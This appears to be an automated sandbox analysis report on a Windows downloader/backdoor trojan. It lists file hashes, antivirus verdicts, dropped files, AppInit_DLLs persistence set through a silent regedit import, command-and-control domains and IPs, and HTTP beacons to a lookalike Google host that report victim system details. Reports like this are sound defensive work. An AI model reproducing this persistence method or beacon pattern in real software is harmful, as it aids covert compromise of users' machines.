Analysis Date: 2015-01-16 16:27:13
MD5: 104cdff13c1b880a4acebe1c6da24bd6
SHA1: 86f1025aac9b7303ce167084f522ecf7b67c28ea

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section: CODE md5: a2dc24a95e90f82cb4926bb9d950942d sha1: 7372cfa8c984161e168ee94b4e7d0bc68e107c32 size: 129024
Section: DATA md5: ebe7fcecc1bc793477929e46fd5db6ec sha1: 48c754e52146eaa9e3da0452fb17a6c03c10e494 size: 7168
Section: BSS md5: d41d8cd98f00b204e9800998ecf8427e sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 size: 0
Section: .idata md5: b8021ddb18f69448fa12a7869f24464a sha1: 6846bff00ae9365e0afb3e90966887dcfe100f07 size: 2048
Section: .reloc md5: f8856b7cc160e6ea65959c7c597fa61f sha1: 74d7f8bde7a559a39d47314756afa04dd381f436 size: 6656
Section: .rsrc md5: d5d1701b235d842798701902f4f2c238 sha1: ce1aab3589310a284a466e50ca1208b14649361a size: 2560
Timestamp: 1992-06-22 01:34:17
PEhash: d1d574505329973b7562bafa07888768fbaff728
IMPhash: e80ebfb404a0444c6f31da5db62e6eb5
AV: 360 Safe: no_virus
AV: Ad-Aware: Gen:Variant.Kazy.408
AV: Alwil (avast): no_virus
AV: Arcabit (arcavir): Gen:Variant.Kazy.408
AV: Authentium: no_virus
AV: Avira (antivir): TR/Kazy.66926.20
AV: BullGuard: Gen:Variant.Kazy.408
AV: CA (E-Trust Ino): no_virus
AV: CAT (quickheal): no_virus
AV: ClamAV: no_virus
AV: Dr. Web: Trojan.LoadMoney.225
AV: Emsisoft: Backdoor.Win32.Cidox
AV: Eset (nod32): Win32/Kryptik.AVWN
AV: Fortinet: W32/Kryptik.WIE!tr
AV: Frisk (f-prot): no_virus
AV: F-Secure: Gen:Variant.Kazy.408
AV: Grisoft (avg): Generic31.CKOA
AV: Ikarus: Trojan-Downloader.Win32.Vundo
AV: K7: Trojan ( 7000000f1 )
AV: Kaspersky: Trojan.Win32.Generic
AV: MalwareBytes: no_virus
AV: Mcafee: no_virus
AV: Microsoft Security Essentials: TrojanDropper:Win32/Vundo.AA
AV: MicroWorld (escan): Gen:Variant.Kazy.408
AV: Rising: no_virus
AV: Sophos: Troj/LdMon-D
AV: Symantec: Downloader
AV: Trend Micro: TROJ_SPNR.0BFC13
AV: VirusBlokAda (vba32): Backdoor.Cidox

Runtime Details:

Process
↳ C:\malware.exe

Creates File: C:\Documents and Settings\Administrator\My Documents\Iterra\0105.tmp
Creates File: C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\BSDHA97U\desktop.ini
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\IIQ3LGTM\desktop.ini
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\desktop.ini
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\desktop.ini
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\D4Z32ED8\desktop.ini
Deletes File: C:\Documents and Settings\Administrator\Cookies\index.dat

Process
↳ C:\WINDOWS\Explorer.EXE

Registry: HKEY_CURRENT_USER\SessionInformation\ProgramCount ➝ NULL
Creates File: \Device\Afd\Endpoint
Creates File: C:\WINDOWS\system32\hnlkwmh.dll
Creates File: C:\Documents and Settings\Administrator\Cookies\cf
Deletes File: C:\Documents and Settings\Administrator\My Documents\Iterra\0105.tmp
Deletes File: C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg
Creates Process: C:\WINDOWS\regedit.exe /s C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg

Process
↳ C:\WINDOWS\regedit.exe /s C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg

Registry: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs ➝ C:\WINDOWS\system32\hnlkwmh.dll\\x00

Network Details:

DNS: knockdast.com, Type: A, 208.73.211.178
DNS: knockdast.com, Type: A, 208.73.210.200
DNS: knockdast.com, Type: A, 208.73.210.214
DNS: knockdast.com, Type: A, 208.73.210.217
DNS: debijonda.com, Type: A, 209.99.40.223
DNS: veroconma.com, Type: A, 74.117.179.241
DNS: theloamva.com, Type: A, 209.222.14.3
DNS: vornedix.com, Type: A, 209.222.14.3
DNS: dentagod.com, Type: A, 209.222.14.3
DNS: liteworns.com, Type: A, 209.222.14.3
DNS: vengibit.com, Type: A, 209.222.14.3
DNS: tryangets.com, Type: A, 209.222.14.3
DNS: getintsu.com, Type: A, 109.234.109.82
DNS: inzavora.com, Type: A, 109.234.109.76
DNS: knresszip.com, Type: A
DNS: degoog1etag.com, Type: A
DNS: getinball.com, Type: A
DNS: kndeszip.com, Type: A
DNS: getavodes.com, Type: A
DNS: tryatdns.com, Type: A
DNS: fescheck.com, Type: A
DNS: netrovad.com, Type: A
DNS: terrans.su, Type: A
DNS: clickstano.com, Type: A
DNS: denareclick.com, Type: A
DNS: clickbeta.ru, Type: A
DNS: nshouse1.com, Type: A
DNS: clickclans.ru, Type: A
HTTP GET: http://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=2723&av=0&vm=0&al=0&p=557&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg9gNhHyiy5opgxuYFhW1CsjDmh312rvqQ4wCmc9n5nL/
User-Agent:
HTTP GET: http://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=2723&av=0&vm=0&al=0&p=557&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg9gNhHyiy5opgxuYFhW1CsjDmh312rvqQ+ghWll6NamH
User-Agent:
HTTP GET: http://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=2723&av=0&vm=0&al=0&p=557&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg9gNhHyiy5opgxuYFhW1CsjDmh312rvqQzjIrSdLPnwF
User-Agent:
HTTP GET: http://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=2723&av=0&vm=0&al=0&p=557&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg9gNhHyiy5opgxuYFhW1CsjDmh312rvqQxY8na97bOwH
User-Agent:
HTTP GET: http://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=2723&av=0&vm=0&al=0&p=557&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg9gNhHyiy5opgxuYFhW1CsjDmh312rvqQ20EF7Fyeevf
User-Agent:
HTTP GET: http://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=2723&av=0&vm=0&al=0&p=557&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg9gNhHyiy5opgxuYFhW1CsjDmh312rvqQxXDuLoYpyRu
User-Agent:
HTTP GET: http://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=2723&av=0&vm=0&al=0&p=557&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg9gNhHyiy5opgxuYFhW1CsjDmh312rvqQ3T05itqvGNd
User-Agent:
Flows TCP: 192.168.1.1:1031 ➝ 208.73.211.178:80
Flows TCP: 192.168.1.1:1032 ➝ 209.99.40.223:80
Flows TCP: 192.168.1.1:1033 ➝ 74.117.179.241:80
Flows TCP: 192.168.1.1:1034 ➝ 209.222.14.3:80
Flows TCP: 192.168.1.1:1035 ➝ 209.222.14.3:80
Flows TCP: 192.168.1.1:1036 ➝ 209.222.14.3:80
Flows TCP: 192.168.1.1:1037 ➝ 209.222.14.3:80
Flows TCP: 192.168.1.1:1038 ➝ 209.222.14.3:80
Flows TCP: 192.168.1.1:1039 ➝ 209.222.14.3:80
Flows TCP: 192.168.1.1:1040 ➝ 109.234.109.82:80
Flows TCP: 192.168.1.1:1041 ➝ 109.234.109.76:80
Flows TCP: 192.168.1.1:1042 ➝ 91.220.35.154:80

Raw Pcap

Strings